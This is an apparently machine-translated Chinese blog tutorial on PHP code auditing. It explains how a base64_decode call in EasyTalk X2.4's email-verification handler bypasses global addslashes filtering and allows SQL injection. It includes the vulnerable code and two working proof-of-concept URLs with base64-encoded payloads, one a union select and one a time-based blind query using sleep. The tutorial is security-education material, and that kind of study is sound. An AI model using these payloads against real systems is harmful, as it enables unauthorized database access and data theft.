"PHP code Audit" Those years we dug together SQL injection-3. Global Protection Bypass Base64decode

0x01 background

Today's web programs basically have a global filter for SQL injection, like PHP to open the GPC or on the global file common.php using the Addslashes () function to filter the received parameters, especially single quotes. In the same article, we need to find some encoding and decoding functions to bypass the global protection, this article describes the case of Base64decode ().
The loophole comes from dark clouds: http://www.wooyun.org/bugs/wooyun-2014-050338

0X02 Environment Construction

Look at the background we used the lower version of the Easytalk program, the version is X2.4
① source I packed a copy: Http://pan.baidu.com/s/1bopOFNL
② Extract to www easytalk directory, follow the prompts step by step installation can, encounter problems themselves Baidu or Google, after successful visits such as:

0X03 Vulnerability Analysis

First look at the source structure, with the thinkphp framework, more complex:

Interested can go to study and then continue to look down, the novice can know that the thinkphp to receive the parameters are filtered, and depending on whether your server open GPC will do the appropriate processing:
1./thinkphp/extend/library/org/util/input.class.php file Line No. 266:

<?php /** +---------------------------------------------------------- * If MAGIC_QUOTES_GPC is off, this function can escape the string +---------------------------------------------------------- *@access Public +---------------------------------------------------------- *@param string $string to be processed +---------------------------------------------------------- * @return String +---------------------------------------------------------- */ Static public function addslashes($string) { if (!GET_MAGIC_QUOTES_GPC ()) { $string = addslashes ($string); } return $string; }

2. Use the global search function of the Seay code audit system to search for files containing the keyword "Base64_decode", and find SettingAction.class.php contains a place to base64_decode the received parameters Auth:

3. We followed up this PHP file and found that although the Daddslashes function was used for injection filtering, the Base64_decode function was used to transcode the parameter auth so that the filter could be bypassed to inject:

Certified Email PublicfunctionDoauth() { $_authmsg=daddslashes ($_get[' Auth ']);Again determine if the GPC is open and injected into the filter $authmsg =base64_decode ($_AUTHMSG);Base64_decode function to transcode parameters $tem =explode (":",$AUTHMSG);The decoded parameter authmsg is divided into the array tem by ":" $send _id=$tem [0]; $user =m (' Users '); $row =$user->field (' Mailadres,auth_email ')->where ("User_id= ' $send _id '")->find ();Brought into the query, in the WHERE clause, causing the injection if ($_authmsg==$row [' Auth_email ']) { $user->where ("User_id= ' $send _id '")->setfield (' Auth_email ',1); Setcookie ( ' Setok ', Json_encode (array ( ' lang ' =>l ( ' mail6 '), 1)), 0, else { Setcookie (array ( ' lang ' =>l ( ' Mail7 '), 2), 0, '/?m=setting&a=mailauth '); } /span>

0x04 Vulnerability Proof

To construct a POC that obtains information about the database:

http://localhost/eazytalk/?m=setting&a=doauth&auth=aGFja2luZycgdW5pb24gc2VsZWN0IHVzZXIoKSwyIw==

View SQL statement Discovery successful execution:

Found here is a blind note, and there is no output, so we use the SQL Blinds statement. Gets the first character of the current database user name that is not a POC of ' R ' (ASCII value 114):

http://localhost/eazytalk/?m=index&a=mailactivity&auth=MicgYW5kIChzZWxlY3QgaWYoKGFzY2lpKHN1YnN0cmluZygoc2VsZWN0IHVzZXIoKSksMSwxKSkgPSAxMTQpLHNsZWVwKDUpLDApKSM=

The page lasted 5 seconds, stating that the first character of user () was ' r ', and the view of the SQL statement found successfully executed:

Finally, interested students can write a PY script to run the blind.

Original link: http://www.cnbraid.com/2016/02/18/sql2/, please contact the author if you need to reprint.

"PHP code Audit" Those years we dug together SQL injection-3. Global Protection Bypass Base64decode